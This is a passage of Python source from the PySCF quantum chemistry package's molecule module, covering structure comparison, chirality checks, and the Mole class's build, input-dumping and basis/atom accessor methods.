mol.bas_atom(ib)\n p0 = p1\n b0 = ib\n p1 += mol.bas_len_spinor(ib) * mol.bas_nctr(ib)\n aorange.append((b0, mol.nbas, p0, p1))\n return aorange\n\ndef same_mol(mol1, mol2, tol=1e-5, cmp_basis=True, ignore_chiral=False):\n '''Compare the two molecules whether they have the same structure.\n\n Kwargs:\n tol : float\n In Bohr\n cmp_basis : bool\n Whether to compare basis functions for the two molecules\n '''\n import pyscf.symm\n\n if mol1._atom.__len__() != mol2._atom.__len__():\n return False\n\n chg1 = mol1._atm[:,CHARGE_OF]\n chg2 = mol2._atm[:,CHARGE_OF]\n if not numpy.all(numpy.sort(chg1) == numpy.sort(chg2)):\n return False\n\n if cmp_basis:\n atomtypes1 = atom_types(mol1._atom, mol1._basis)\n atomtypes2 = atom_types(mol2._atom, mol2._basis)\n for k in atomtypes1:\n if k not in atomtypes2:\n return False\n elif len(atomtypes1[k]) != len(atomtypes2[k]):\n return False\n elif mol1._basis[k] != mol2._basis[k]:\n return False\n\n def finger(mol, chgs, coord):\n center = charge_center(mol._atom, chgs, coord)\n im = inertia_momentum(mol._atom, chgs, coord)\n w, v = numpy.linalg.eigh(im)\n axes = v.T\n if numpy.linalg.det(axes) < 0:\n axes *= -1\n r = numpy.dot(coord-center, axes.T)\n return w, r\n\n coord1 = mol1.atom_coords()\n coord2 = mol2.atom_coords()\n w1, r1 = finger(mol1, chg1, coord1)\n w2, r2 = finger(mol2, chg2, coord2)\n if not (numpy.allclose(w1, w2, atol=tol)):\n return False\n\n rotate_xy = numpy.array([[-1., 0., 0.],\n [ 0.,-1., 0.],\n [ 0., 0., 1.]])\n rotate_yz = numpy.array([[ 1., 0., 0.],\n [ 0.,-1., 0.],\n [ 0., 0.,-1.]])\n rotate_zx = numpy.array([[-1., 0., 0.],\n [ 0., 1., 0.],\n [ 0., 0.,-1.]])\n\n def inspect(z1, r1, z2, r2):\n place = int(-numpy.log10(tol)) - 1\n idx = pyscf.symm.argsort_coords(r2, place)\n z2 = z2[idx]\n r2 = r2[idx]\n for rot in (1, rotate_xy, rotate_yz, rotate_zx):\n r1new = numpy.dot(r1, rot)\n idx = pyscf.symm.argsort_coords(r1new, place)\n if (numpy.all(z1[idx] == z2) and\n numpy.allclose(r1new[idx], r2, atol=tol)):\n return True\n return False\n\n return (inspect(chg1, r1, chg2, r2) or\n (ignore_chiral and inspect(chg1, r1, chg2, -r2)))\nis_same_mol = same_mol\n\ndef chiral_mol(mol1, mol2=None):\n '''Detect whether the given molelcule is chiral molecule or two molecules\n are chiral isomers.\n '''\n if mol2 is None:\n mol2 = mol1.copy()\n ptr_coord = mol2._atm[:,PTR_COORD]\n mol2._env[ptr_coord ] *= -1\n mol2._env[ptr_coord+1] *= -1\n mol2._env[ptr_coord+2] *= -1\n return (not same_mol(mol1, mol2, ignore_chiral=False) and\n same_mol(mol1, mol2, ignore_chiral=True))\n\ndef inertia_momentum(atoms, charges=None, coords=None):\n if charges is None:\n charges = numpy.array([_charge(a[0]) for a in atoms])\n if coords is None:\n coords = numpy.array([a[1] for a in atoms], dtype=float)\n chgcenter = numpy.einsum('i,ij->j', charges, coords)/charges.sum()\n coords = coords - chgcenter\n im = numpy.einsum('i,ij,ik->jk', charges, coords, coords)/charges.sum()\n return im\n\ndef charge_center(atoms, charges=None, coords=None):\n if charges is None:\n charges = numpy.array([_charge(a[0]) for a in atoms])\n if coords is None:\n coords = numpy.array([a[1] for a in atoms], dtype=float)\n rbar = numpy.einsum('i,ij->j', charges, coords)/charges.sum()\n return rbar\n\ndef mass_center(atoms):\n mass = numpy.array([param.ELEMENTS[_charge(a[0])][1] for a in atoms])\n return charge_center(atoms, mass)\n\ndef condense_to_shell(mol, mat, compressor=numpy.max):\n '''The given matrix is first partitioned to blocks, based on AO shell as\n delimiter. Then call compressor function to abstract each block.\n '''\n ao_loc = mol.ao_loc_nr()\n abstract = numpy.empty((mol.nbas,mol.nbas))\n for i, i0 in enumerate(ao_loc[:mol.nbas]):\n for j, j0 in enumerate(ao_loc[:mol.nbas]):\n abstract[i,j] = compressor(mat[i0:ao_loc[i+1],j0:ao_loc[j+1]])\n return abstract\n\n\ndef check_sanity(obj, keysref, stdout=sys.stdout):\n sys.stderr.write('Function pyscg.gto.mole.check_sanity will be removed in PySCF-1.1. '\n 'It is replaced by pyscg.lib.check_sanity\\n')\n return pyscf.lib.check_sanity(obj, keysref, stdout)\n\n\n# for _atm, _bas, _env\nCHARGE_OF = 0\nPTR_COORD = 1\nNUC_MOD_OF = 2\nPTR_ZETA = 3\nATM_SLOTS = 6\nATOM_OF = 0\nANG_OF = 1\nNPRIM_OF = 2\nNCTR_OF = 3\nRADI_POWER = 3 # for ECP\nKAPPA_OF = 4\nPTR_EXP = 5\nPTR_COEFF = 6\nBAS_SLOTS = 8\n# pointer to env\nPTR_LIGHT_SPEED = 0\nPTR_COMMON_ORIG = 1\nPTR_RINV_ORIG = 4\nPTR_RINV_ZETA = 7\nPTR_RANGE_OMEGA = 8\nPTR_ECPBAS_OFFSET = 18\nPTR_NECPBAS = 19\nPTR_ENV_START = 20\n# parameters from libcint\nNUC_POINT = 1\nNUC_GAUSS = 2\n\n\n#\n# Mole class handles three layers: input, internal format, libcint arguments.\n# The relationship of the three layers are, eg\n# .atom (input) <=> ._atom (for python) <=> ._atm (for libcint)\n# .basis (input) <=> ._basis (for python) <=> ._bas (for libcint)\n# input layer does not talk to libcint directly. Data are held in python\n# internal fomrat layer. Most of methods defined in this class only operates\n# on the internal format. Exceptions are make_env, make_atm_env, make_bas_env,\n# set_common_orig_, set_rinv_orig_ which are used to manipulate the libcint arguments.\n#\nclass Mole(pyscf.lib.StreamObject):\n '''Basic class to hold molecular structure and global options\n\n Attributes:\n verbose : int\n Print level\n output : str or None\n Output file, default is None which dumps msg to sys.stdout\n max_memory : int, float\n Allowed memory in MB\n light_speed :\n Default is set in lib.parameters.LIGHTSPEED\n charge : int\n Charge of molecule. It affects the electron numbers\n spin : int\n 2S, num. alpha electrons - num. beta electrons\n symmetry : bool or str\n Whether to use symmetry. When this variable is set to True, the\n molecule will be rotated and the highest rotation axis will be\n placed z-axis.\n If a string is given as the name of point group, the given point\n group symmetry will be used. Note that the input molecular\n coordinates will not be changed in this case.\n symmetry_subgroup : str\n subgroup\n\n atom : list or str\n To define molecluar structure. The internal format is\n\n | atom = [[atom1, (x, y, z)],\n | [atom2, (x, y, z)],\n | ...\n | [atomN, (x, y, z)]]\n\n unit : str\n Angstrom or Bohr\n basis : dict or str\n To define basis set.\n nucmod : dict or str\n Nuclear model\n\n ** Following attributes are generated by :func:`Mole.build` **\n\n stdout : file object\n Default is sys.stdout if :attr:`Mole.output` is not set\n groupname : str\n One of D2h, C2h, C2v, D2, Cs, Ci, C2, C1\n nelectron : int\n sum of nuclear charges - :attr:`Mole.charge`\n symm_orb : a list of numpy.ndarray\n Symmetry adapted basis. Each element is a set of symm-adapted orbitals\n for one irreducible representation. The list index does **not** correspond\n to the id of irreducible representation.\n irrep_id : a list of int\n Each element is one irreducible representation id associated with the basis\n stored in symm_orb. One irrep id stands for one irreducible representation\n symbol. The irrep symbol and the relevant id are defined in\n :attr:`symm.parameters.IRREP_ID_TABLE`\n irrep_name : a list of str\n Each element is one irreducible representation symbol associated with the basis\n stored in symm_orb. The irrep symbols are defined in\n :attr:`symm.parameters.IRREP_ID_TABLE`\n _built : bool\n To label whether :func:`Mole.build` has been called. It ensures some functions\n being initialized once.\n _basis : dict\n like :attr:`Mole.basis`, the internal format which is returned from the\n parser :func:`format_basis`\n _keys : a set of str\n Store the keys appeared in the module. It is used to check misinput attributes\n\n ** Following attributes are arguments used by ``libcint`` library **\n\n _atm :\n :code:`[[charge, ptr-of-coord, nuc-model, ptr-zeta, 0, 0], [...]]`\n each element reperesents one atom\n natm :\n number of atoms\n _bas :\n :code:`[[atom-id, angular-momentum, num-primitive-GTO, num-contracted-GTO, 0, ptr-of-exps, ptr-of-contract-coeff, 0], [...]]`\n each element reperesents one shell\n nbas :\n number of shells\n _env :\n list of floats to store the coordinates, GTO exponents, contract-coefficients\n\n Examples:\n\n >>> mol = Mole(atom='H^2 0 0 0; H 0 0 1.1', basis='sto3g').build()\n >>> print(mol.atom_symbol(0))\n H^2\n >>> print(mol.atom_pure_symbol(0))\n H\n >>> print(mol.nao_nr())\n 2\n >>> print(mol.intor('cint1e_ovlp_sph'))\n [[ 0.99999999 0.43958641]\n [ 0.43958641 0.99999999]]\n >>> mol.charge = 1\n >>> mol.build()\n has no attributes Charge\n\n '''\n def __init__(self, **kwargs):\n self.verbose = logger.NOTE\n self.output = None\n self.max_memory = param.MEMORY_MAX\n\n self.light_speed = param.LIGHTSPEED\n self.charge = 0\n self.spin = 0 # 2j == nelec_alpha - nelec_beta\n self.symmetry = False\n self.symmetry_subgroup = None\n\n# Save inputs\n# self.atom = [(symb/nuc_charge, (coord(Angstrom):0.,0.,0.)), ...]\n self.atom = []\n# the unit (angstrom/bohr) of the coordinates defined by the input self.atom\n self.unit = 'angstrom'\n# self.basis = {atom_type/nuc_charge: [l, kappa, (expnt, c_1, c_2,..),..]}\n self.basis = 'sto-3g'\n# self.nucmod = {atom_symbol: nuclear_model, atom_id: nuc_mod}, atom_id is 1-based\n self.nucmod = {}\n# self.ecp = {atom_symbol: [[l, (r_order, expnt, c),...]]}\n self.ecp = {}\n##################################################\n# don't modify the following private variables, they are not input options\n self._atm = []\n self._bas = []\n self._env = [0] * PTR_ENV_START\n self._ecpbas = []\n\n self.stdout = sys.stdout\n self.groupname = 'C1'\n self.topgroup = 'C1'\n self.symm_orb = None\n self.irrep_id = None\n self.irrep_name = None\n self.incore_anyway = False\n self._nelectron = None\n self._atom = None\n self._basis = None\n self._ecp = None\n self._built = False\n self._keys = set(self.__dict__.keys())\n self.__dict__.update(kwargs)\n\n @property\n def natm(self):\n return len(self._atm)\n @property\n def nbas(self):\n return len(self._bas)\n\n @property\n def nelec(self):\n nalpha = (self.nelectron+self.spin)//2\n nbeta = nalpha - self.spin\n return nalpha, nbeta\n @property\n def nelectron(self):\n if self._nelectron is None:\n return tot_electrons(self)\n else:\n return self._nelectron\n @nelectron.setter\n def nelectron(self, n):\n self._nelectron = n\n\n# need \"deepcopy\" here because in shallow copy, _env may get new elements but\n# with ptr_env unchanged\n# def __copy__(self):\n# cls = self.__class__\n# newmol = cls.__new__(cls)\n# newmol = ...\n# do not use __copy__ to aovid iteratively call copy.copy\n def copy(self):\n return copy(self)\n\n pack = pack\n @pyscf.lib.with_doc(unpack.__doc__)\n def unpack(self, moldic):\n return unpack(moldic)\n def unpack_(self, moldic):\n self.__dict__.update(moldic)\n return self\n\n dumps = dumps\n @pyscf.lib.with_doc(loads.__doc__)\n def loads(self, molstr):\n return loads(molstr)\n def loads_(self, molstr):\n self.__dict__.update(loads(molstr).__dict__)\n return self\n\n#TODO: remove kwarg mass=None. Here to keep compatibility to old chkfile format\n def build(self, dump_input=True, parse_arg=True,\n verbose=None, output=None, max_memory=None,\n atom=None, basis=None, unit=None, nucmod=None, ecp=None,\n charge=None, spin=None, symmetry=None,\n symmetry_subgroup=None, light_speed=None, mass=None):\n '''Setup moleclue and initialize some control parameters. Whenever you\n change the value of the attributes of :class:`Mole`, you need call\n this function to refresh the internal data of Mole.\n\n Kwargs:\n dump_input : bool\n whether to dump the contents of input file in the output file\n parse_arg : bool\n whether to read the sys.argv and overwrite the relevant parameters\n verbose : int\n Print level. If given, overwrite :attr:`Mole.verbose`\n output : str or None\n Output file. If given, overwrite :attr:`Mole.output`\n max_memory : int, float\n Allowd memory in MB. If given, overwrite :attr:`Mole.max_memory`\n atom : list or str\n To define molecluar structure.\n basis : dict or str\n To define basis set.\n nucmod : dict or str\n Nuclear model. If given, overwrite :attr:`Mole.nucmod`\n charge : int\n Charge of molecule. It affects the electron numbers\n If given, overwrite :attr:`Mole.charge`\n spin : int\n 2S, num. alpha electrons - num. beta electrons\n If given, overwrite :attr:`Mole.spin`\n symmetry : bool or str\n Whether to use symmetry. If given a string of point group\n name, the given point group symmetry will be used.\n light_speed :\n If given, overwrite :attr:`Mole.light_speed`\n\n '''\n# release circular referred objs\n# Note obj.x = obj.member_function causes circular referrence\n gc.collect()\n\n if verbose is not None: self.verbose = verbose\n if output is not None: self.output = output\n if max_memory is not None: self.max_memory = max_memory\n if atom is not None: self.atom = atom\n if basis is not None: self.basis = basis\n if unit is not None: self.unit = unit\n if nucmod is not None: self.nucmod = nucmod\n if ecp is not None: self.ecp = ecp\n if charge is not None: self.charge = charge\n if spin is not None: self.spin = spin\n if symmetry is not None: self.symmetry = symmetry\n if symmetry_subgroup is not None: self.symmetry_subgroup = symmetry_subgroup\n if light_speed is not None: self.light_speed = light_speed\n\n if parse_arg:\n _update_from_cmdargs_(self)\n\n # avoid to open output file twice\n if parse_arg and self.output is not None \\\n and self.stdout.name != self.output:\n self.stdout = open(self.output, 'w')\n\n if self.verbose >= logger.WARN:\n self.check_sanity()\n\n self._atom = self.format_atom(self.atom, unit=self.unit)\n uniq_atoms = set([a[0] for a in self._atom])\n\n if isinstance(self.basis, str):\n # specify global basis for whole molecule\n self._basis = self.format_basis(dict([(a, self.basis)\n for a in uniq_atoms]))\n else:\n self._basis = self.format_basis(self.basis)\n\n# TODO: Consider ECP info into symmetry\n if self.ecp:\n if isinstance(self.ecp, str):\n self._ecp = self.format_ecp(dict([(a, self.ecp)\n for a in uniq_atoms]))\n else:\n self._ecp = self.format_ecp(self.ecp)\n\n if self.symmetry:\n import pyscf.symm\n if isinstance(self.symmetry, str):\n self.symmetry = pyscf.symm.std_symb(self.symmetry)\n self.topgroup = self.symmetry\n orig = 0\n axes = numpy.eye(3)\n self.groupname, axes = pyscf.symm.subgroup(self.topgroup, axes)\n if not pyscf.symm.check_given_symm(self.groupname, self._atom,\n self._basis):\n self.topgroup, orig, axes = \\\n pyscf.symm.detect_symm(self._atom, self._basis)\n self.groupname, axes = pyscf.symm.subgroup(self.topgroup, axes)\n _atom = self.format_atom(self._atom, orig, axes, 'Bohr')\n _atom = '\\n'.join([str(a) for a in _atom])\n raise RuntimeWarning('Unable to identify input symmetry %s.\\n'\n 'Try symmetry=\"%s\" with geometry (unit=\"Bohr\")\\n%s' %\n (self.symmetry, self.topgroup, _atom))\n else:\n self.topgroup, orig, axes = \\\n pyscf.symm.detect_symm(self._atom, self._basis)\n self.groupname, axes = pyscf.symm.subgroup(self.topgroup, axes)\n if isinstance(self.symmetry_subgroup, str):\n self.symmetry_subgroup = \\\n pyscf.symm.std_symb(self.symmetry_subgroup)\n assert(self.symmetry_subgroup in\n pyscf.symm.param.SUBGROUP[self.groupname])\n if (self.symmetry_subgroup == 'Cs' and self.groupname == 'C2v'):\n raise RuntimeError('TODO: rotate mirror or axes')\n self.groupname = self.symmetry_subgroup\n# Note the internal _format is in Bohr\n self._atom = self.format_atom(self._atom, orig, axes, 'Bohr')\n\n self._env[PTR_LIGHT_SPEED] = self.light_speed\n self._atm, self._bas, self._env = \\\n self.make_env(self._atom, self._basis, self._env, self.nucmod)\n self._atm, self._ecpbas, self._env = \\\n self.make_ecp_env(self._atm, self._ecp, self._env)\n if (self.nelectron+self.spin) % 2 != 0:\n raise RuntimeError('Electron number %d and spin %d are not consistent\\n'\n 'Note spin = 2S = Nalpha-Nbeta, not the definition 2S+1' %\n (self.nelectron, self.spin))\n\n if self.symmetry:\n import pyscf.symm\n try:\n eql_atoms = pyscf.symm.symm_identical_atoms(self.groupname, self._atom)\n except RuntimeError:\n raise RuntimeError('''Given symmetry and molecule structure not match.\nNote when symmetry attributes is assigned, the molecule needs to be put in the proper orientation.''')\n self.symm_orb, self.irrep_id = \\\n pyscf.symm.symm_adapted_basis(self.groupname, eql_atoms,\n self._atom, self._basis)\n self.irrep_name = [pyscf.symm.irrep_id2name(self.groupname, ir)\n for ir in self.irrep_id]\n\n if dump_input and not self._built and self.verbose > logger.NOTE:\n self.dump_input()\n\n logger.debug3(self, 'arg.atm = %s', str(self._atm))\n logger.debug3(self, 'arg.bas = %s', str(self._bas))\n logger.debug3(self, 'arg.env = %s', str(self._env))\n logger.debug3(self, 'ecpbas = %s', str(self._ecpbas))\n\n self._built = True\n return self\n kernel = build\n\n @pyscf.lib.with_doc(format_atom.__doc__)\n def format_atom(self, atom, origin=0, axes=1, unit='Ang'):\n return format_atom(atom, origin, axes, unit)\n\n @pyscf.lib.with_doc(format_basis.__doc__)\n def format_basis(self, basis_tab):\n return format_basis(basis_tab)\n\n @pyscf.lib.with_doc(format_ecp.__doc__)\n def format_ecp(self, ecp_tab):\n return format_ecp(ecp_tab)\n\n @pyscf.lib.with_doc(expand_etb.__doc__)\n def expand_etb(self, l, n, alpha, beta):\n return expand_etb(l, n, alpha, beta)\n\n @pyscf.lib.with_doc(expand_etbs.__doc__)\n def expand_etbs(self, etbs):\n return expand_etbs(etbs)\n etbs = expand_etbs\n\n def make_env(self, atoms, basis, pre_env=[], nucmod={}):\n return make_env(atoms, basis, pre_env, nucmod)\n\n def make_atm_env(self, atom, ptr=0):\n return make_atm_env(atom, ptr)\n\n def make_bas_env(self, basis_add, atom_id=0, ptr=0):\n return make_bas_env(basis_add, atom_id, ptr)\n\n def make_ecp_env(self, _atm, _ecp, pre_env=[]):\n if _ecp:\n _atm, _ecpbas, _env = make_ecp_env(self, _atm, _ecp, pre_env)\n else:\n _atm, _ecpbas, _env = _atm, [], pre_env\n return _atm, _ecpbas, _env\n\n tot_electrons = tot_electrons\n\n @pyscf.lib.with_doc(gto_norm.__doc__)\n def gto_norm(self, l, expnt):\n return gto_norm(l, expnt)\n\n\n def dump_input(self):\n import __main__\n if hasattr(__main__, '__file__'):\n try:\n filename = os.path.abspath(__main__.__file__)\n finput = open(filename, 'r')\n self.stdout.write('\\n')\n self.stdout.write('INFO: **** input file is %s ****\\n' % filename)\n self.stdout.write(finput.read())\n self.stdout.write('INFO: ******************** input file end ********************\\n')\n self.stdout.write('\\n')\n finput.close()\n except IOError:\n logger.warn(self, 'input file does not exist')\n\n self.stdout.write('System: %s\\n' % str(platform.uname()))\n self.stdout.write('Date: %s\\n' % time.ctime())\n try:\n import pyscf\n pyscfdir = os.path.abspath(os.path.join(__file__, '..', '..'))\n self.stdout.write('PySCF version %s\\n' % pyscf.__version__)\n self.stdout.write('PySCF path %s\\n' % pyscfdir)\n with open(os.path.join(pyscfdir, '.git', 'ORIG_HEAD')) as f:\n self.stdout.write('GIT ORIG_HEAD %s' % f.read())\n head = os.path.join(pyscfdir, '.git', 'HEAD')\n with open(head, 'r') as f:\n head = f.read().splitlines()[0]\n self.stdout.write('GIT HEAD %s\\n' % head)\n # or command(git log -1 --pretty=%H)\n if head.startswith('ref:'):\n branch = os.path.basename(head)\n head = os.path.join(pyscfdir, '.git', head.split(' ')[1])\n with open(head, 'r') as f:\n self.stdout.write('GIT %s branch %s' % (branch, f.readline()))\n self.stdout.write('\\n')\n except IOError:\n pass\n\n self.stdout.write('[INPUT] VERBOSE %d\\n' % self.verbose)\n self.stdout.write('[INPUT] light speed = %s\\n' % self.light_speed)\n self.stdout.write('[INPUT] num atoms = %d\\n' % self.natm)\n self.stdout.write('[INPUT] num electrons = %d\\n' % self.nelectron)\n self.stdout.write('[INPUT] charge = %d\\n' % self.charge)\n self.stdout.write('[INPUT] spin (= nelec alpha-beta = 2S) = %d\\n' % self.spin)\n\n for ia,atom in enumerate(self._atom):\n coorda = tuple([x * param.BOHR for x in atom[1]])\n coordb = tuple([x for x in atom[1]])\n self.stdout.write('[INPUT]%3d %-4s %16.12f %16.12f %16.12f AA '\\\n '%16.12f %16.12f %16.12f Bohr\\n' \\\n % ((ia+1, _symbol(atom[0])) + coorda + coordb))\n if self.nucmod:\n self.stdout.write('[INPUT] Gaussian nuclear model for atoms %s\\n' %\n self.nucmod.keys())\n\n self.stdout.write('[INPUT] ---------------- BASIS SET ---------------- \\n')\n self.stdout.write('[INPUT] l, kappa, [nprim/nctr], ' \\\n 'expnt, c_1 c_2 ...\\n')\n for atom, basis in self._basis.items():\n self.stdout.write('[INPUT] %s\\n' % atom)\n for b in basis:\n if isinstance(b[1], int):\n kappa = b[1]\n b_coeff = b[2:]\n else:\n kappa = 0\n b_coeff = b[1:]\n self.stdout.write('[INPUT] %d %2d [%-5d/%-4d] ' \\\n % (b[0], kappa, b_coeff.__len__(), \\\n b_coeff[0].__len__()-1))\n for k, x in enumerate(b_coeff):\n if k == 0:\n self.stdout.write('%-15.12g ' % x[0])\n else:\n self.stdout.write(' '*32+'%-15.12g ' % x[0])\n for c in x[1:]:\n self.stdout.write(' %4.12g' % c)\n self.stdout.write('\\n')\n\n logger.info(self, 'nuclear repulsion = %.15g', self.energy_nuc())\n if self.symmetry:\n if self.topgroup == self.groupname:\n logger.info(self, 'point group symmetry = %s', self.topgroup)\n else:\n logger.info(self, 'point group symmetry = %s, use subgroup %s',\n self.topgroup, self.groupname)\n for ir in range(self.symm_orb.__len__()):\n logger.info(self, 'num. orbitals of irrep %s = %d',\n self.irrep_name[ir], self.symm_orb[ir].shape[1])\n logger.info(self, 'number of shells = %d', self.nbas)\n logger.info(self, 'number of NR pGTOs = %d', self.npgto_nr())\n logger.info(self, 'number of NR cGTOs = %d', self.nao_nr())\n if self.verbose >= logger.DEBUG1:\n for i in range(len(self._bas)):\n exps = self.bas_exp(i)\n logger.debug1(self, 'bas %d, expnt(s) = %s', i, str(exps))\n\n logger.info(self, 'CPU time: %12.2f', time.clock())\n return self\n\n def set_common_orig(self, coord):\n '''Update common origin which held in :class`Mole`._env. **Note** the unit is Bohr\n\n Examples:\n\n >>> mol.set_common_orig(0)\n >>> mol.set_common_orig((1,0,0))\n '''\n self._env[PTR_COMMON_ORIG:PTR_COMMON_ORIG+3] = coord\n return self\n set_common_origin = set_common_orig\n set_common_orig_ = set_common_orig # for backward compatibility\n set_common_origin_ = set_common_orig # for backward compatibility\n\n def set_rinv_orig(self, coord):\n r'''Update origin for operator :math:`\\frac{1}{|r-R_O|}`. **Note** the unit is Bohr\n\n Examples:\n\n >>> mol.set_rinv_orig(0)\n >>> mol.set_rinv_orig((0,1,0))\n '''\n self._env[PTR_RINV_ORIG:PTR_RINV_ORIG+3] = coord[:3]\n return self\n set_rinv_origin = set_rinv_orig\n set_rinv_orig_ = set_rinv_orig # for backward compatibility\n set_rinv_origin_ = set_rinv_orig # for backward compatibility\n\n def set_range_coulomb(self, omega):\n '''Apply the long range part of range-separated Coulomb operator for\n **all** 2e integrals\n erf(omega r12) / r12\n set omega to 0 to siwtch off the range-separated Coulomb\n '''\n self._env[PTR_RANGE_OMEGA] = omega\n set_range_coulomb_ = set_range_coulomb # for backward compatibility\n\n def set_nuc_mod(self, atm_id, zeta):\n '''Change the nuclear charge distribution of the given atom ID. The charge\n distribution is defined as: rho(r) = nuc_charge * Norm * exp(-zeta * r^2).\n This function can **only** be called after .build() method is executed.\n\n Examples:\n\n >>> for ia in range(mol.natm):\n ... zeta = gto.filatov_nuc_mod(mol.atom_charge(ia))\n ... mol.set_nuc_mod(ia, zeta)\n '''\n ptr = self._atm[atm_id,PTR_ZETA]\n self._env[ptr] = zeta\n return self\n set_nuc_mod_ = set_nuc_mod # for backward compatibility\n\n def set_rinv_zeta(self, zeta):\n '''Assume the charge distribution on the \"rinv_orig\". zeta is the parameter\n to control the charge distribution: rho(r) = Norm * exp(-zeta * r^2).\n **Be careful** when call this function. It affects the behavior of\n cint1e_rinv_* functions. Make sure to set it back to 0 after using it!\n '''\n self._env[PTR_RINV_ZETA] = zeta\n return self\n set_rinv_zeta_ = set_rinv_zeta # for backward compatibility\n\n def update(self, chkfile):\n return self.update_from_chk(chkfile)\n def update_from_chk(self, chkfile):\n import h5py\n with h5py.File(chkfile, 'r') as fh5:\n mol = loads(fh5['mol'].value)\n self.__dict__.update(mol.__dict__)\n return self\n\n\n#######################################################\n#NOTE: atm_id or bas_id start from 0\n def atom_symbol(self, atm_id):\n r'''For the given atom id, return the input symbol (without striping special characters)\n\n Args:\n atm_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H^2 0 0 0; H 0 0 1.1')\n >>> mol.atom_symbol(0)\n H^2\n '''\n return _symbol(self._atom[atm_id][0])\n\n def atom_pure_symbol(self, atm_id):\n r'''For the given atom id, return the standard symbol (striping special characters)\n\n Args:\n atm_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H^2 0 0 0; H 0 0 1.1')\n >>> mol.atom_symbol(0)\n H\n '''\n return _std_symbol(self._atom[atm_id][0])\n\n def atom_charge(self, atm_id):\n r'''Nuclear effective charge of the given atom id\n Note \"atom_charge /= _charge(atom_symbol)\" when ECP is enabled.\n Number of electrons screened by ECP can be obtained by _charge(atom_symbol)-atom_charge\n\n Args:\n atm_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1')\n >>> mol.atom_charge(1)\n 17\n '''\n return self._atm[atm_id,CHARGE_OF]\n\n def atom_charges(self):\n '''np.asarray([mol.atom_charge(i) for i in range(mol.natm)])'''\n return self._atm[:,CHARGE_OF]\n\n def atom_nelec_core(self, atm_id):\n '''Number of core electrons for pseudo potential.\n '''\n return _charge(self.atom_symbol(atm_id)) - self.atom_charge(atm_id)\n\n def atom_coord(self, atm_id):\n r'''Coordinates (ndarray) of the given atom id\n\n Args:\n atm_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1')\n >>> mol.atom_coord(1)\n [ 0. 0. 2.07869874]\n '''\n ptr = self._atm[atm_id,PTR_COORD]\n return self._env[ptr:ptr+3]\n\n def atom_coords(self):\n '''np.asarray([mol.atom_coords(i) for i in range(mol.natm)])'''\n ptr = self._atm[:,PTR_COORD]\n return self._env[numpy.vstack((ptr,ptr+1,ptr+2))].T\n\n def atom_nshells(self, atm_id):\n r'''Number of basis/shells of the given atom\n\n Args:\n atm_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1')\n >>> mol.atom_nshells(1)\n 5\n '''\n return (self._bas[:,ATOM_OF] == atm_id).sum()\n\n def atom_shell_ids(self, atm_id):\n r'''A list of the shell-ids of the given atom\n\n Args:\n atm_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.atom_shell_ids(1)\n [3, 4, 5, 6, 7]\n '''\n return numpy.where(self._bas[:,ATOM_OF] == atm_id)[0]\n\n def bas_coord(self, bas_id):\n r'''Coordinates (ndarray) associated with the given basis id\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1')\n >>> mol.bas_coord(1)\n [ 0. 0. 2.07869874]\n '''\n atm_id = self.bas_atom(bas_id)\n ptr = self._atm[atm_id,PTR_COORD]\n return self._env[ptr:ptr+3]\n\n def bas_atom(self, bas_id):\n r'''The atom (0-based id) that the given basis sits on\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.bas_atom(7)\n 1\n '''\n return self._bas[bas_id,ATOM_OF]\n\n def bas_angular(self, bas_id):\n r'''The angular momentum associated with the given basis\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.bas_atom(7)\n 2\n '''\n return self._bas[bas_id,ANG_OF]\n\n def bas_nctr(self, bas_id):\n r'''The number of contracted GTOs for the given shell\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.bas_atom(3)\n 3\n '''\n return self._bas[bas_id,NCTR_OF]\n\n def bas_nprim(self, bas_id):\n r'''The number of primitive GTOs for the given shell\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.bas_atom(3)\n 11\n '''\n return self._bas[bas_id,NPRIM_OF]\n\n def bas_kappa(self, bas_id):\n r'''Kappa (if l < j, -l-1, else l) of the given shell\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.bas_kappa(3)\n 0\n '''\n return self._bas[bas_id,KAPPA_OF]\n\n def bas_exp(self, bas_id):\n r'''exponents (ndarray) of the given shell\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.bas_kappa(0)\n [ 13.01 1.962 0.4446]\n '''\n nprim = self.bas_nprim(bas_id)\n ptr = self._bas[bas_id,PTR_EXP]\n return self._env[ptr:ptr+nprim]\n\n def _libcint_ctr_coeff(self, bas_id):\n nprim = self.bas_nprim(bas_id)\n nctr = self.bas_nctr(bas_id)\n ptr = self._bas[bas_id,PTR_COEFF]\n return self._env[ptr:ptr+nprim*nctr].reshape(nctr,nprim).T\n def bas_ctr_coeff(self, bas_id):\n r'''Contract coefficients (ndarray) of the given shell\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.M(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.bas_ctr_coeff(0)\n [[ 10.03400444]\n [ 4.1188704 ]\n [ 1.53971186]]\n '''\n l = self.bas_angular(bas_id)\n es = self.bas_exp(bas_id)\n cs = self._libcint_ctr_coeff(bas_id)\n cs = numpy.einsum('pi,p->pi', cs, 1/gto_norm(l, es))\n return cs\n\n def 